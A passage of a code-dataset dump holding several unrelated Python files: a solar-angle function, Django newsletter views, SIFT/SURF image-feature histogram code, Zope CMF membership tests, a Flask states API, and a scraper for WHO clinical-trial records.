datetime.datetime.utcnow().hour\n ST = timezone + UTCh\n h=15*(ST-12)\n solaraltitudesin = math.cos(math.radians(h))*math.cos(math.radians(dec))*math.cos(math.radians(lati))+math.sin(math.radians(dec))*math.sin(math.radians(lati))\n solaraltitude = math.degrees(math.asin(solaraltitudesin))\n solarazimuthcos = (math.sin(math.radians(dec))-math.sin(math.radians(solaraltitude))*math.sin(math.radians(lati)))/(math.cos(math.radians(solaraltitude))*math.cos(math.radians(lati)))\n solarazimuth = math.degrees(math.acos(solarazimuthcos))\n # print(h)\n if(h>=0):\n solarazimuth = - solarazimuth\n return round(solaraltitude,2),round(solarazimuth,2)\n\n\nif __name__ == '__main__':\n longitude = 121.47\n latitude = 31.23\n y = solarAngles(longitude,latitude)\n print(y)","sub_path":"solarAngles.py","file_name":"solarAngles.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"386351849","text":"from post.models import *\nfrom newsletter.models import *\nfrom django.http import HttpResponse\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, get_object_or_404\n\"\"\"\n Sending NewsLetter \n\"\"\"\ndef SendLetter(request):\n emails = list(Newsletter.objects.values_list(\"email\", flat=True).all())\n latest = Posts.objects.order_by(\"-pk\")[0:3]\n html = render_to_string(\n \"Newsletter/newsletter.htm\", context={\n \"posts\":latest\n }\n )\n send_mail(\n \"Daliy Newsletter From Scott Wilson Blogging Site\",\n message=\"newsletter\",\n recipient_list=emails,\n from_email=\"ScottWilson@gmail.com \",\n html_message=html,\n )\n return render(request,\"Newsletter/newsletter.htm\", context={\n \"posts\":latest\n })\n \n\"\"\"\n Oping into Newsletter\n\"\"\"\ndef JoinLetter(request):\n if request.method == \"POST\":\n email = request.POST.get('email')\n if request.user.is_authenticated:\n if Newsletter.objects.filter(email=request.user.email).exists():\n return HttpResponse(\"Email Already Exists In Our Newsletter\")\n else:\n news = Newsletter(email=request.user.email)\n news.save()\n return HttpResponse(\"You Have Successfully Subcribe To Our Newsletter\")\n else: \n if email == \"\":\n return HttpResponse(\"Email Field Can't Be Left Null\")\n else:\n if Newsletter.objects.filter(email=email).exists():\n return HttpResponse(\"Email Already Exists In Our Newsletter\")\n else:\n news = Newsletter(email=email)\n news.save()\n return HttpResponse(\"You Have Successfully Subcribe To Our Newsletter\")\n\"\"\"\n Oping out of Newsletter\n\"\"\"\ndef LeaveLetter(request):\n if request.user.is_authenticated:\n if Newsletter.objects.filter(email=request.user.email).exists():\n news = get_object_or_404(Newsletter, email=request.user.email)\n news.delete()\n return HttpResponse(\"You Have UnSubcribed From Our Newsletter\")\n else: \n if request.method == \"POST\":\n pks = request.POST.get(\"email\")\n if Newsletter.objects.filter(email=pks).exists():\n news = get_object_or_404(Newsletter, pk=pk)\n news.delete()\n return HttpResponse(\"You Have UnSubcribed From Our Newsletter\")\n ","sub_path":"blog/newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119010896","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport pickle\nfrom numpy.testing import 
assert_allclose\nimport glob\nfrom scipy.spatial.distance import cdist\nimport json\nfrom load_data import *\nfrom highlight import *\nfrom useful_functions import save, load\n\n\"\"\"############################################################################\n## Functions for generating SIFT features\n## --------------------------------------\n:: 1. Dense SIFT\n:: 2. SIFT\n:: 3. SURF\n############################################################################\"\"\"\n\n# Dense SIFT\ndef get_dsift(img, step=4):\n\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n\n # Create SIFT extractor\n sift = cv2.xfeatures2d.SIFT_create()\n\n # Get gray image\n gray_img = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n # Extract keypoints on a dense grid\n keypoints = [cv2.KeyPoint(x, y, step)\n for y in range(0, gray_img.shape[0], step)\n for x in range(0, gray_img.shape[1], step)]\n\n # Compute SIFT descriptors at the dense keypoints\n keypoints, descriptors = sift.compute(gray_img, keypoints)\n\n # Return keypoints and descriptors\n return keypoints, descriptors\n\n# SIFT\ndef get_sift(img):\n\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n\n # Create SIFT extractor\n sift = cv2.xfeatures2d.SIFT_create()\n\n # Get gray image\n gray_img = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n\n # Extract SIFT features\n keypoints, descriptors = sift.detectAndCompute(gray_img, None)\n\n # Return keypoints and descriptors\n return keypoints, descriptors\n\n# SURF\ndef get_surf(img, Hessian_threshold=400):\n # Make a copy\n if type(img) == str:\n im = cv2.imread(img)\n else:\n im = img\n surf = cv2.xfeatures2d.SURF_create(Hessian_threshold)\n # surf.extended = True\n keypoints, descriptors = surf.detectAndCompute(im, None)\n return keypoints, descriptors\n\n\"\"\"############################################################################\n## Extract descriptors for all images\n## ----------------------------------\n:: Extract features with the chosen 'method': 'sift', 'dsift' or 'surf'\n############################################################################\"\"\"\n\ndef get_all_descriptors(images, method='sift'):\n\n # List of descriptors\n descriptors = []\n\n # List of images that have no descriptors\n has_no_desc = list()\n\n # Extract descriptors for all images\n i = 0\n for im in images:\n print(i+1, '/', len(images))\n\n # SIFT or DSIFT\n if method == 'dsift':\n kp, desc = get_dsift(im)\n elif method == 'sift':\n kp, desc = get_sift(im)\n elif method == 'surf':\n kp, desc = get_surf(im)\n\n # Check if kp is empty\n if not kp:\n has_no_desc.append(i)\n i += 1\n continue\n\n # Add to list of descriptors\n descriptors.append(desc)\n\n i += 1\n\n # Return list of all descriptors\n return descriptors, has_no_desc\n\n\"\"\"############################################################################\n## Get subset of all descriptors\n## -----------------------------\n############################################################################\"\"\"\n\n# Get fraction of descriptors\ndef get_subset_of_all_descriptors(descriptors, fraction, num_of_classes):\n\n # Number of iteration\n iter = fraction * (1./float(num_of_classes)) * len(descriptors)\n\n # List of subset of descriptors\n sub_descriptors = []\n\n # Get subset of all descriptors\n desc_index = 0\n for img in range(num_of_classes):\n for i in range(int(iter)):\n sub_descriptors.append(descriptors[desc_index])\n desc_index += 1\n\n # Return subset of descriptors\n return 
sub_descriptors\n\n\"\"\"############################################################################\n## K-means\n## -------\n:: OpenCV's kmeans function\n#############################################################################\"\"\"\n\n# K-means openCV\ndef k_means(features, k):\n\n # Convert to float32\n features = np.float32(features)\n\n # OpenCV criteria\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n\n # Run kmeans\n _, label, center = cv2.kmeans(features, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n # Return labels, centers\n return label, center\n\n\"\"\"############################################################################\n## Create histograms\n## -----------------\n:: 1. Create a histogram matrix of zeros of size (n_descriptors × k)\n:: 2. For each descriptor:\n:: 3. Calculate minimum distances to cluster centers\n:: 4. Assign labels to each row of the descriptor\n:: 5. Increase the value by 1 in the corresponding bin of the current histogram\n:: 6. Normalize histogram\n:: 7. Return histogram matrix\n############################################################################\"\"\"\n\ndef create_histograms(descriptors, cluster_centers):\n\n # Create empty matrix for histograms\n histograms = np.zeros((len(descriptors), len(cluster_centers)))\n\n # Create histograms\n pic = 0\n for des in descriptors:\n\n # Calculate distances from cluster centers\n distances = cdist(des, cluster_centers)\n\n # Generate histograms for all images\n for i in range(len(des)):\n\n # Get label of closest cluster center\n label = np.argmin(distances[i])\n\n # Add to histogram\n histograms[pic][label] += 1\n\n # Normalize histogram\n histograms[pic] = histograms[pic] / np.max(histograms[pic])\n pic+=1\n\n # Return histograms\n return histograms\n\n\"\"\"############################################################################\n## Build database\n############################################################################\"\"\"\n\ndef build_database(images, k=10, fraction=1., n_classes=5, method='sift'):\n\n # Extract descriptors\n print('[INFO] Extracting features...')\n descriptors, to_omit = get_all_descriptors(images, method)\n\n # Get subset of descriptors\n # print('Creating subset...')\n # subset_of_descriptors = get_subset_of_all_descriptors(descriptors, fraction, n_classes)\n\n # Stack subset of descriptors\n # print('Stacking subset of descriptors...')\n # return subset_of_descriptors\n all_descriptors = np.vstack((descriptors))\n\n # Run K-means\n print('[INFO] Running k-means... 
(k =', str(k) + ')')\n label, center = k_means(all_descriptors, k)\n\n # Create histograms\n print('[INFO] Creating histograms...')\n histograms = create_histograms(descriptors, center)\n\n return histograms, to_omit\n\n\"\"\"############################################################################\n## Ex.\n############################################################################\"\"\"\n\nif __name__ == '__main__':\n\n # _, _, images, targets = load_data_2(json_path='Jos_jsons/', images_path='Jos_images/')\n path = 'Jos_images/'\n to_dir = 'Jos_histograms/orig_2/'\n images, targets = load_data_3(path=path)\n # BLACKS = glob.glob(path + 'black/*.png')\n # WHITES = glob.glob(path + 'white/*.png')\n # images = images[:10]\n print('[INFO] Num of images:', len(images))\n K = [5, 10, 20, 50, 100, 200]\n # methods = ['sift', 'dsift', 'surf']\n methods = ['surf']\n save_histograms = 1\n if save_histograms:\n for method in methods:\n for k in K:\n print(method, 'k =', k)\n\n # ORIGINAL\n # print('orig...')\n histograms_orig, leave_out_orig = build_database(images, k=k, method=method)\n save(histograms_orig, to_dir + 'Jos_H_orig_' + method + '_' + str(k) + '.pkl')\n save(leave_out_orig, to_dir + 'Jos_L_orig_' + method + '_' + str(k) + '.pkl')\n\n # # BLACK\n # print('black...')\n # historgrams_black, leave_out_black = build_database(BLACKS, k=k, method=method)\n # dir = 'Jos_histograms/black/'\n # save(historgrams_black, dir + 'Jos_H_black_' + method + '_' + str(k) + '.pkl')\n # save(leave_out_black, dir + 'Jos_L_black_' + method + '_' + str(k) + '.pkl')\n #\n # # WHITE\n # print('white...')\n # historgrams_white, leave_out_white = build_database(WHITES, k=k, method=method)\n # dir = 'Jos_histograms/white/'\n # save(historgrams_white, dir + 'Jos_H_white_' + method + '_' + str(k) + '.pkl')\n # save(leave_out_white, dir + 'Jos_L_white_' + method + '_' + str(k) + '.pkl')\n","sub_path":"extract_hist.py","file_name":"extract_hist.py","file_ext":"py","file_size_in_byte":8685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"235231471","text":"from unittest import TestCase, TestSuite, makeSuite, main\n\nimport Zope\ntry:\n Zope.startup()\nexcept AttributeError:\n # for Zope versions before 2.6.1\n pass\ntry:\n from Interface.Verify import verifyClass\nexcept ImportError:\n # for Zope versions before 2.6.0\n from Interface import verify_class_implementation as verifyClass\n\nfrom Products.CMFCore.PortalFolder import PortalFolder\nfrom Products.CMFCore.tests.base.dummy import DummyFolder as DummyFolderBase\nfrom Products.CMFCore.tests.base.dummy import DummyTool\nfrom Products.CMFCore.tests.base.dummy import DummyUserFolder\nfrom Products.CMFCore.tests.base.testcase import SecurityTest\n\nfrom Products.CMFDefault.MembershipTool import MembershipTool\n\n\nclass DummyFolder(DummyFolderBase):\n def manage_addPortalFolder(self, id, title=''):\n self._setObject( id, DummyFolder() )\n def changeOwnership(self, user):\n pass\n def manage_setLocalRoles(self, userid, roles):\n pass\n def getPhysicalRoot(self):\n return self\n def unrestrictedTraverse(self, path, default=None, restricted=0):\n return self.acl_users\n\nclass MembershipToolTests(TestCase):\n\n def setUp(self):\n self.site = DummyFolder()\n self.mtool = MembershipTool().__of__(self.site)\n\n def test_createMemberarea(self):\n mtool = self.mtool\n self.site._setObject( 'Members', DummyFolder() )\n self.site._setObject( 'acl_users', DummyUserFolder() )\n self.site._setObject( 'portal_workflow', 
DummyTool() )\n self.site.user_bar = 'test attribute'\n mtool.createMemberarea('user_foo')\n self.failUnless( hasattr(self.site.Members.aq_self, 'user_foo') )\n mtool.createMemberarea('user_bar')\n self.failUnless( hasattr(self.site.Members.aq_self, 'user_bar'),\n 'CMF Collector issue #102 (acquisition bug)' )\n\n def test_MembersFolder_methods(self):\n mtool = self.mtool\n self.assertEqual( mtool.getMembersFolder(), None )\n self.site._setObject( 'Members', DummyFolder() )\n self.assertEqual( mtool.getMembersFolder(), self.site.Members )\n mtool.setMembersFolderById(id='foo')\n self.assertEqual( mtool.getMembersFolder(), None )\n self.site._setObject( 'foo', DummyFolder() )\n self.assertEqual( mtool.getMembersFolder(), self.site.foo )\n mtool.setMembersFolderById()\n self.assertEqual( mtool.getMembersFolder(), None )\n\n def test_interface(self):\n from Products.CMFDefault.interfaces.portal_membership \\\n import portal_membership as IMembershipTool\n from Products.CMFCore.interfaces.portal_actions \\\n import ActionProvider as IActionProvider\n\n verifyClass(IMembershipTool, MembershipTool)\n verifyClass(IActionProvider, MembershipTool)\n\n\nclass MembershipToolSecurityTests(SecurityTest):\n\n def setUp(self):\n SecurityTest.setUp(self)\n self.site = DummyFolder()\n self.site.id = 'testSite'\n self.mtool = MembershipTool().__of__(self.site)\n\n def test_createMemberarea(self):\n mtool = self.mtool\n self.site._setObject( 'Members', PortalFolder('Members') )\n self.site._setObject( 'acl_users', DummyUserFolder() )\n self.site._setObject( 'portal_workflow', DummyTool() )\n mtool.createMemberarea('user_foo')\n\n f = self.site.Members.user_foo\n ownership = self.site.acl_users.user_foo\n localroles = ( ( 'user_foo', ('Owner',) ), )\n self.assertEqual( f.getOwner(), ownership )\n self.assertEqual( f.get_local_roles(), localroles,\n 'CMF Collector issue #162 (LocalRoles broken): %s'\n % str( f.get_local_roles() ) )\n self.assertEqual( f.index_html.getOwner(), ownership,\n 'CMF Collector issue #162 (Ownership broken): %s'\n % str( f.index_html.getOwner() ) )\n self.assertEqual( f.index_html.get_local_roles(), localroles,\n 'CMF Collector issue #162 (LocalRoles broken): %s'\n % str( f.index_html.get_local_roles() ) )\n\n\ndef test_suite():\n return TestSuite((\n makeSuite( MembershipToolTests ),\n makeSuite( MembershipToolSecurityTests )\n ))\n\nif __name__ == '__main__':\n main(defaultTest='test_suite')\n","sub_path":"CMF/tags/1.4.7/CMFDefault/tests/test_MembershipTool.py","file_name":"test_MembershipTool.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"175265134","text":"#!/usr/bin/python3\n\"\"\"Module to create a flask route\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request, Blueprint\nfrom models import storage\nfrom models.state import State\n\n\n@app_views.route('/states', methods=['GET'], strict_slashes=False)\ndef statesGetter():\n \"\"\"View all the states\"\"\"\n Allstate = []\n for states in storage.all(\"State\").values():\n Allstate.append(states.to_dict())\n return jsonify(Allstate)\n\n\n@app_views.route('/states/', methods=['GET'],\n strict_slashes=False)\ndef stateGetter(state_id):\n \"\"\"View a specific state\"\"\"\n state = storage.get(\"State\", state_id)\n if state is None:\n abort(404)\n return jsonify(state.to_dict())\n\n\n@app_views.route('/states/', methods=['DELETE'],\n strict_slashes=False)\ndef 
stateDeleter(state_id):\n \"\"\"delete a state\"\"\"\n delete_state = storage.get(\"State\", state_id)\n if delete_state is None:\n abort(404)\n delete_state.delete()\n storage.save()\n return (jsonify({}))\n\n\n@app_views.route('/states/', methods=['POST'], strict_slashes=False)\ndef statePoster():\n \"\"\"creates a new state\"\"\"\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n if \"name\" not in request.get_json():\n return make_response(jsonify({\"error\": \"Missing name\"}), 400)\n new_state = State(**request.get_json())\n new_state.save()\n return make_response(jsonify(new_state.to_dict()), 201)\n\n\n@app_views.route('/states/', methods=['PUT'],\n strict_slashes=False)\ndef stateUpdater(state_id):\n \"\"\"Update created state\"\"\"\n state_update = storage.get(\"State\", state_id)\n if state_update is None:\n abort(404)\n if not request.get_json():\n return make_response(jsonify({\"error\": \"Not a JSON\"}), 400)\n for key, value in request.get_json().items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(state_update, key, value)\n state_update.save()\n return jsonify(state_update.to_dict())\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"104277717","text":"import re\nimport copy\nimport logging\nfrom urllib2 import urlparse\nfrom datetime import datetime,timedelta\nfrom cgi import parse_qsl\nfrom urllib import urlencode\nfrom tgimport import tg\nfrom baseconnector import BaseConnector\nfrom utils.utils import stripHtml, get_hash\nfrom utils.decorators import logit\nfrom utils.sessioninfomanager import checkSessionInfo, updateSessionInfo\n\nlog = logging.getLogger('TrialSearchConnector')\nclass TrialSearchConnector(BaseConnector):\n @logit(log , 'fetch')\n def fetch(self):\n baseuri = 'http://apps.who.int/trialsearch/crawl/'\n if 'crawl0' in self.currenturi:\n self.__setSoupForCurrentUri()\n linkinfo = self.soup.find('table',id='DataList1').findAll('tr',recursive = False)\n links = [baseuri + each.find('td',recursive = 'False').find('a')['href'] for each in linkinfo] \n if not links:\n log.info(self.log_msg('No Links found'))\n return False\n for link in links[:]: \n self.currenturi = link\n self.__setSoupForCurrentUri()\n for eachlink in [ x['href'] for x in self.soup.find('table',id= 'DataList1').findAll('a')][:]:\n temp_task = self.task.clone()\n log.info(eachlink)\n temp_task.instance_data['uri'] = eachlink\n self.linksOut.append(temp_task)\n## self.__createTasksForLinks() \n log.exception(self.log_msg('LINKSOUT: ' + str(len(self.linksOut))))\n #self.linksOut = [] \n else:\n self.__addInfo() \n return True \n \n## except:\n## log.exception(self.log_msg('can not find the data %s'))\n## return False\n## return True\n## self.__createTasksForLinks()\n \n## log.exception(self.log_msg('LINKSOUT: ' + str(len(self.linksOut))))\n## self.linksOut = [] \n \n @logit(log, '__addInfo')\n def __addInfo(self):\n self.__task_elements_dict = {\n 'priority':self.task.priority,\n 'level': self.task.level,\n 'last_updated_time':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'pickup_date':datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\"),\n 'connector_instance_log_id': self.task.connector_instance_log_id,\n 'connector_instance_id':self.task.connector_instance_id,\n 'workspace_id':self.task.workspace_id,\n 'client_id':self.task.client_id,\n 
'client_name':self.task.client_name,\n 'versioned':False,\n 'category':self.task.instance_data.get('category',''),\n 'task_log_id':self.task.id }\n try:\n unique_key = self.currenturi\n #self.currenturi = nextlink\n log.info(self.log_msg('current uri: %s'%self.currenturi))\n if checkSessionInfo('review', self.session_info_out, unique_key, \\\n self.task.instance_data.get('update'),parent_list\\\n = [self.currenturi]):\n log.info(self.log_msg('Session info returns True for uri %s'\\\n %unique_key))\n return False\n self.__setSoupForCurrentUri() \n page = self.__getData()\n #self.pages.append(page)\n #log.info(self.log_msg('Page added'))\n if not page:\n return True\n result = updateSessionInfo('review', self.session_info_out, \n unique_key,get_hash( page ),'forum', self.task.instance_data.get('update')\\\n ,parent_list=[self.currenturi])\n if result['updated']:\n page['path'] = [ self.currenturi]\n page['parent_path'] = []\n page['uri']= self.currenturi \n page['uri_domain'] = urlparse.urlparse(page['uri'])[1]\n page['entity'] = 'post'\n #log.info(page)\n page.update(self.__task_elements_dict)\n self.pages.append(page)\n log.info(self.log_msg('Page added'))\n else:\n log.info(self.log_msg('Update session info returns False for \\\n url %s'%self.currenturi))\n except:\n log.exception(self.log_msg('Cannot add the post for the uri %s'\\\n %self.currenturi))\n return True \n \n \n @logit(log, '__getData')\n def __getData(self):\n \n page = {}\n \n try:\n page['title'] = stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find title'))\n \n try:\n page['data'] = stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find data')) \n \n try:\n page['posted_date'] = datetime.strftime(datetime.utcnow(),\"%Y-%m-%dT%H:%M:%SZ\") \n except:\n log.exception(self.log_msg('can not find posted date')) \n \n try:\n page['et_trial_register'] = stripHtml(self.soup.find('td',text =re.compile('Register:')).findNext('td').renderContents())\n except:\n log.exception(self.log_msg('can not find register'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Last refreshed on:')).findNext('td').renderContents())\n page['edate_mainrecord_last_update'] = datetime.strftime(datetime.strptime(date_str,'%d %B %Y'),\"%Y-%m-%dT%H:%M:%SZ\")\n \n except:\n log.exception(self.log_msg('can not find last update')) \n \n try:\n page['et_mainrecord_nctid'] = stripHtml(self.soup.find('td',text =re.compile('Main ID:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Date of registration:')).findNext('td').renderContents())\n if '-' in date_str:\n split_char = '-'\n elif '/' in date_str:\n split_char = '/'\n if len(date_str.split(split_char)[-1])==4:\n char_order = ['%d', '%m', '%Y']\n else:\n char_order = ['%Y', '%m', '%d']\n page['edate_mainrecord_trial_registration_date'] = datetime.strftime(datetime.strptime(date_str, split_char.join(char_order)), \"%Y-%m-%dT%H:%M:%SZ\")\n except:\n log.exception(self.log_msg('can not find registration date'))\n \n \n try:\n page['et_mainrecord_lead_sponsor'] = stripHtml(self.soup.find('td',text =re.compile('Primary sponsor:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Primary sponsor'))\n \n try:\n page['et_mainrecord_brief_title'] = 
stripHtml(self.soup.find('td',text =re.compile('Public title')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find title')) \n \n try:\n page['et_mainrecord_official_title'] = stripHtml(self.soup.find('td',text =re.compile('Scientific title:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find scientific title'))\n \n try:\n date_str = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n if '-' in date_str:\n split_char = '-'\n elif '/' in date_str:\n split_char = '/'\n if len(date_str.split(split_char)[-1])==4:\n char_order = ['%d', '%m', '%Y']\n else:\n char_order = ['%Y', '%m', '%d']\n page['edate_mainrecord_enrolment'] = datetime.strftime(datetime.strptime(date_str, split_char.join(char_order)), \"%Y-%m-%dT%H:%M:%SZ\")\n## try:\n#### date_str = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n#### page['et_mainrecord_enrolment'] = datetime.strftime(datetime.strptime(date_str,'%d/%m/%Y'),\"%Y-%m-%dT%H:%M:%SZ\")\n## page['et_mainrecord_enrolment'] = stripHtml(self.soup.find('td',text =re.compile('Date of first enrolment:')).findNext('td').renderContents())\n except:\n log.exception(self.log_msg('can not find Date of first enrolment'))\n \n try:\n page['et_trial_target_sample_size'] = stripHtml(self.soup.find('td',text =re.compile('Target sample size:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Target sample size'))\n try:\n page['et_mainrecord_recruitment_status'] = stripHtml(self.soup.find('td',text =re.compile('Recruitment status:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Recruitment status'))\n \n try:\n page['et_mainrecord_url'] = stripHtml(self.soup.find('td',text =re.compile('URL:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find URL'))\n \n try:\n page['et_mainrecord_study_type'] = stripHtml(self.soup.find('td',text =re.compile('Study type:')).findNext('td').renderContents())\n \n except:\n log.exception(self.log_msg('can not find Study type'))\n \n \n try:\n page['et_mainrecord_study_design'] = stripHtml(self.soup.find('td',text =re.compile('Study design:')).findNext('td').renderContents()) \n \n except:\n log.exception(self.log_msg('can not find Study design'))\n \n \n try:\n page['et_trial_countries_of_recruitment'] = stripHtml(self.soup.find('span',text =re.compile('Countries of recruitment')).findParent('tr').findNext('tr').find('span').renderContents())\n \n \n except:\n log.exception(self.log_msg('can not find countries for recruitment'))\n \n try:\n contactinfo = self.soup.find('table',id = re.compile('DataList4')).findAll('tr',recursive = False)[1]\n datainfo = [x for x in contactinfo.findAll('td',recursive = False) if stripHtml(x.renderContents())]\n if datainfo:\n tab =datainfo[0].find('table').findAll('tr') \n try:\n page['et_mainrecord_responsible_contact_person_first_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*FirstnameLabel')).renderContents())\n page['et_mainrecord_responsible_contact_person_last_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*LastnameLabel')).renderContents())\n except:\n log.exception(self.log_msg('can no find contact person name1'))\n try:\n page['et_trial_responsible_contact_person_address'] = stripHtml(tab[1].find('td',text =re.compile('Address:')).findNext('td').renderContents())\n \n 
except:\n log.exception(self.log_msg('can not find contact address'))\n \n try:\n page['et_trial_responsible_contact_person_telephone_no'] = stripHtml(tab[2].find('span',id =re.compile('\\w*TelephoneLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact Telephone no1'))\n \n try:\n page['et_trial_responsible_contact_person_email'] = stripHtml(tab[3].find('span',id =re.compile('\\w*EmailLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact email1'))\n \n try:\n page['et_trial_responsible_contact_person_affiliation'] = stripHtml(tab[4].find('span',id =re.compile('\\w*AffiliationLabel')).renderContents())\n log.info(page['et_trial_responsible_contact_person_affiliation'])\n except:\n log.exception(self.log_msg('can not find contact affiliation1'))\n \n \n if len(datainfo)>=2:\n tab =datainfo[1].find('table').findAll('tr') \n try:\n page['et_mainrecord_research_contact_person_first_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*FirstnameLabel')).renderContents())\n #log.info(page['et_mainrecord_research_contact_person_first_name'])\n page['et_mainrecord_research_contact_person_last_name'] = stripHtml(tab[0].find('span',id =re.compile('\\w*LastnameLabel')).renderContents())\n except:\n log.exception(self.log_msg('can no find contact person name1'))\n try:\n page['et_trial_research_contact_person_address'] = stripHtml(tab[1].find('span',id =re.compile('\\w*AddressLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact address'))\n \n try:\n page['et_trial_research_contact_person_telephone_no'] = stripHtml(tab[2].find('span',id =re.compile('\\w*TelephoneLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact Telephone no2'))\n \n try:\n page['et_trial_research_contact_person_email'] = stripHtml(tab[3].find('span',id =re.compile('\\w*EmailLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find contact email2'))\n \n try:\n page['et_trial_research_contact_person_affiliation'] = stripHtml(tab[4].find('span',id =re.compile('\\w*AffiliationLabel')).renderContents())\n #log.info(page['et_contact_affiliation2'])\n except:\n log.exception(self.log_msg('can not find contact affiliation2'))\n \n \n except:\n log.exception(self.log_msg('can no find contact info'))\n \n try:\n page['et_mainrecord_patient_inclusion'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Inclusion_criteriaLabel')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find inclusion criteria not found'))\n \n try:\n page['et_mainrecord_patient_exclusion'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Exclusion_criteriaLabel')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find exclusion criteria not found')) \n \n try:\n page['et_mainrecord_min_age'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label8')).renderContents()) \n except:\n log.exception(self.log_msg('can not find min age'))\n \n try:\n page['et_mainrecord_max_age'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label11')).renderContents()) \n \n except:\n log.exception(self.log_msg('can not find max age'))\n \n## try:\n## page['et_mainrecord_gender'] = stripHtml(self.soup.find('span',id =re.compile('\\w*Label8')).renderContents()) \n## \n## except:\n## log.exception(self.log_msg('can not find gender'))\n try:\n page['et_mainrecord_condition_summary'] = stripHtml(self.soup.find('span',id 
=re.compile('\\w*Condition_FreeTextLabel')).renderContents())\n \n except:\n log.exception(self.log_msg('can not find health condition'))\n try:\n intervention = self.soup.find('table', id=re.compile('DataList10')).findAll('tr')[1:]\n\n page['et_mainrecord_interventions'] = [stripHtml(each.find('span').renderContents()) for each in intervention]\n except:\n log.exception(self.log_msg('can not find interventions'))\n \n try:\n prioutcomes = self.soup.find('table', id=re.compile('DataList12')).findAll('tr')[1:]\n page['et_mainrecord_primary_outcomes'] = [stripHtml(each.find('span').renderContents()) for each in prioutcomes]\n except:\n log.exception(self.log_msg('can not find primary outcomes'))\n \n try:\n secoutcomes = self.soup.find('table', id=re.compile('DataList14')).findAll('tr')[1:] \n page['et_mainrecord_secondary_outcomes'] = [stripHtml(each.find('span').renderContents()) for each in secoutcomes]\n except:\n log.exception(self.log_msg('can not find sec outcomes'))\n \n try:\n secid = self.soup.find('table', id=re.compile('DataList16')).findAll('tr')[1:] \n page['et_trial_secondary_id'] = [stripHtml(each.find('span').renderContents()) for each in secid]\n log.info(page['et_trial_secondary_id'])\n \n except:\n log.exception(self.log_msg('can not find sec id'))\n \n try:\n src_support = self.soup.find('table', id=re.compile('DataList18')).findAll('tr')[1:]\n page['et_trial_source_of_monetary_support'] = [stripHtml(each.find('span').renderContents()) for each in src_support]\n except:\n log.exception(self.log_msg('can not find source for support')) \n \n try:\n secsponsor = self.soup.find('table', id=re.compile('DataList20')).findAll('tr')[1:] \n page['et_mainrecord_secondary_sponsor'] = [stripHtml(each.find('span').renderContents()) for each in secsponsor]\n \n except:\n log.exception(self.log_msg('can not find sec sponser'))\n \n return page \n \n @logit(log, '__setSoupForCurrentUri') \n def __setSoupForCurrentUri(self, data=None, headers={}):\n \"\"\"It will set soup object for the Current URI\n \"\"\"\n res = self._getHTML(data=data, headers=headers)\n if res:\n self.rawpage = res['result']\n else:\n log.info(self.log_msg('Page Content cannot be fetched for the url: \\\n %s'%self.currenturi))\n raise Exception('Page content not fetched for th url %s'%self.currenturi)\n self._setCurrentPage() \n \n 